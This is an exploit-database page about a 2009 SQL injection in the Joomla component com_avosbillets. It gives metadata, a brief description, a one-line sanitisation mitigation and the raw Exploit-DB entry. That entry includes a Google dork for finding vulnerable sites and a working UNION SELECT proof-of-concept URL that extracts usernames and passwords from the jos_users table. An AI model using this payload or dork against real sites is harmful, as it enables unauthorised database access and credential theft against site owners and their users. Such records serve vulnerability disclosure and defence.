header-logo
Suggest Exploit
vendor:
com_avosbillets
by:
Snakespc ALGERIAN HaCkEr
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_avosbillets
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla (com_avosbillets) SQL injection Vulnerability

A vulnerability in Joomla's com_avosbillets component allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'view' task. This can be exploited to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Ensure that input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#--------------------------------------------------------
#Joomla (com_avosbillets) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php      
#-------------------------------------------------------
#Dork:inurl"com_avosbillets"
#Exploit:
#--------
#PoC:
#http://server/index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
----------------------------------------------------------